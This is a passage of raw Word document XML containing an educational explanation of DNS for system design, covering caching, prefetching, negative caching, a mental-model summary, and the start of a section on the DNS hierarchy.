          <w:ilvl w:val="0"/>
          <w:numId w:val="617"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Instant propagation:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> When you change a DNS record in Cloudflare's dashboard, the change propagates to all Cloudflare edge nodes in </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>seconds</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> (internal propagation over Cloudflare's private network). External TTL propagation still takes as long as the record's TTL, but Cloudflare nodes themselves are instantly consistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD4A0A9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="79987A5C">
          <v:rect id="_x0000_i3180" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47243E3F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13. DNS Resolution Performance Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5474E255" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prefetching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231BC2DA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Browsers </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>prefetch DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> for links on the current page before the user clicks them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0EF537" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E23EE3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>&lt;link rel="dns-prefetch" href="//api.example.com"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D934057" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The browser resolves api.example.com in the background. When the user clicks a link, the IP is already in cache — zero DNS latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65181415" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection Pre-warming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C75898" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659EBFCB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>&lt;link rel="preconnect" href="//cdn.example.com"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1630C343" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Goes beyond DNS prefetch — actually establishes the TCP connection and TLS handshake. The connection sits idle, warmed and ready for the first request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BFA61F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Resolver Selection and Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E54E9B9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>DNS resolution latency heavily depends on resolver proximity and cache hit rate. Cloudflare's 1.1.1.1 advertises </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>~1ms average global latency</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A973EB7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="618"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Anycast nodes are in 200+ cities worldwide.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774DCA85" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="618"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Massive shared cache across all clients → very high cache hit rates for popular domains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5F3A90" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="618"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Aggressive prefetching of expiring popular records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26569608" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Negative Caching Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C68426" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>A misconfigured or deleted record can cause extended outages due to </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>negative caching</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>. If clients receive NXDOMAIN for a domain, they cache it for the SOA minimum TTL. Even after you add the record back, clients with cached NXDOMAIN won't see it until their negative cache expires.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C89E70" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="699B15ED">
          <v:rect id="_x0000_i3181" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F731976" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mental Model Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA49791" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E574507" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>DNS = Distributed Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750015F3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">  Structure:   Tree hierarchy (root → TLD → SLD → subdomains)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F570796" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">  Authority:   Delegated at each level via NS records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CAC627" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">  Consistency: Eventual (TTL-controlled caching at every layer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4620BD01" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">  Writes:      At authoritative nameservers (zone files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FFAC59" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">  Reads:       Via recursive resolvers with aggressive caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B83BC22" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">  Fault Tolerance: Redundant nameservers per zone, Anycast distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D52A1D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BD5222" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Resolution Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7504B3A5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">  Browser Cache → OS Cache → Recursive Resolver Cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506CC437" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    → Root NS (referral) → TLD NS (referral) → Authoritative NS (answer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B054CF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B27971" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Each layer caches the answer for TTL seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E9C1C9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">  Total cold-cache latency: 100–300ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BC1EC6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">  Warm-cache latency: &lt;1ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F57B34" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74845B98" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>DNS Consistency Model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BAD107" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">  After a record change:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF1C84B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    - Records already cached: served until TTL expires (no way to force invalidation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9DBB6A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    - New queries: get new value immediately from authoritative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012BA701" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    - Full global propagation: takes max(old TTL) seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B28E82" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    - Pre-change best practice: reduce TTL weeks before, then change, then restore TTL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1711CD19" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The deepest insight about DNS: it is the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>most successful distributed system ever deployed</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> — it runs on tens of thousands of independently operated servers across the globe, maintained by thousands of different organizations, with no central coordinator, no strong consistency, and yet it handles over a trillion queries daily with sub-millisecond latency for cached responses. Its elegance is that </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>eventual consistency via TTL-based caching</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> is the exact right consistency model for the problem — names rarely change, so serving slightly stale data is almost always acceptable in exchange for the massive scalability benefits of aggressive caching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB9A5FE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS (Domain Name System) in System Design — In-Depth Technical Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F21EC59" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What DNS Really Is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1374DB8A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>DNS is a globally distributed, hierarchical, eventually consistent database that maps human-readable domain names (like www.example.com) to machine-routable addresses (like 93.184.216.34 or 2606:2800:220:1:248:1893:25c8:1946). It's the Internet's naming system — the phone book of the digital world.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0517025F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The deeper truth:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> DNS is far more than name-to-IP translation. It's a general-purpose distributed key-value store that maps names to various record types: IP addresses, mail servers, service endpoints, text metadata, cryptographic keys, and arbitrary data. It's one of the oldest and most critical pieces of Internet infrastructure — if DNS fails, effectively nothing works.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC2A3B1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why DNS matters for system design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0EAB71" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Every single request starts with DNS.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Before a client can connect to your service, it must resolve your domain name. DNS latency directly adds to every first connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D40EB5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS is a traffic routing mechanism.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> GeoDNS, weighted records, failover records — DNS is the first layer of global load balancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2744E496" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS is a potential single point of failure.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> If your authoritative DNS is down, no new clients can reach you (even if your servers are perfectly healthy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19021620" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS propagation delays affect deployments.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Changing DNS records takes minutes to hours to propagate globally due to caching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001795FB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS is a security attack surface.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> DNS spoofing, hijacking, and DDoS against DNS infrastructure can take down entire services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E1752F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="3E5AA2B5">
          <v:rect id="_x0000_i3477" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B594BFE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. The DNS Hierarchy — How It's Structured</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC50E10" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 The Hierarchical Namespace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B95DE4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>DNS names form a tree structure, read right to left:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F53EB1E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716F97F7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">                        . (root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6125D62A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">                       / | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0395F7C8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">                    com  org  net  uk  io  ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4F6410" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">                   / |         |       \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBE7A54" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">              google amazon   wiki    example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6967AB0D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">              / |       |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4919F6F3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">           www mail  aws</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0423B155" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fully qualified domain name (FQDN):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6856B051" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>www.example.com. (note the trailing dot — represents the root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B6F43B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Reading from right to left:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C46F58" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="711"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>. — the root zone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF08319" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="711"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>com. — Top-Level Domain (TLD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E220CA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="711"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>example.com. — Second-Level Domain (SLD) — typically what you register</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42109C88" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="711"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>www.example.com. — subdomain (you create these)</w:t>
      </w:r>
    </w:p>
